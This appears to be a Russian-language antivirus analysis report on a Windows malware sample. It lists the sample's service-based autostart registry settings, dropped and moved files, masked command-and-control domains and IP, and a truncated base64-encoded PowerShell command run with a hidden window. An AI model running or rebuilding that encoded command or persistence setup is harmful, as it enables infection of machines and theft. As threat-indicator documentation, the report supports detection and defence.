Техническая информация
Для обеспечения автозапуска и распространения
Устанавливает следующие настройки сервисов
- [<HKLM>\System\CurrentControlSet\Services\adprovider] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\adprovider] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDFO\adprovider.exe"'
Создает следующие сервисы
- 'adprovider' "%WINDIR%\SysWOW64\KBDFO\adprovider.exe"
- 'adprovider' %WINDIR%\SysWOW64\KBDFO\adprovider.exe
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGgAZAA2AGQAdwBxAD0AKAAnAFQAdgBvACcAKwAnAHQAdAAnACsAJwBnAGgAJwApADsAJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQARQBuAFYAOgB0AEUAbQBwAFwATwBGAGYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\office2019\q9b2d8pa2.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\kbdfo\adprovider.exe
Перемещает следующие файлы
- %TEMP%\office2019\q9b2d8pa2.exe в %WINDIR%\syswow64\kbdfo\adprovider.exe
Сетевая активность
Подключается к
- '17#.#4.215.84':80
TCP
Запросы HTTP GET
- http://kr#####urtransfer.com/WLdPbPn/
- http://kr####gaireland.com/cgi-bin/X5h427139317/
- http://la###ni.com.br/pCG/
Запросы HTTP POST
- http://17#.#4.215.84/hGXGrv3Nbbnrs/joFQaiuVwgpYKIqWcp/K5j3R4t/uXQt9HIwfQaKc1j8c5/
UDP
- DNS ASK ha####tanbul.com
- DNS ASK hc###t.com.br
- DNS ASK kr#####urtransfer.com
- DNS ASK kr####gaireland.com
- DNS ASK la###ni.com.br
Другое
Создает и запускает на исполнение
- '%TEMP%\office2019\q9b2d8pa2.exe'
- '%WINDIR%\syswow64\kbdfo\adprovider.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAGgAZAA2AGQAdwBxAD0AKAAnAFQAdgBvACcAKwAnAHQAdAAnACsAJwBnAGgAJwApADsAJgAoACcAbgBlAHcAJwArACcALQAnACsAJwBpAHQAZQBtACcAKQAgACQARQBuAFYAOgB0AEUAbQBwAFwATwBGAGYASQBDAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)
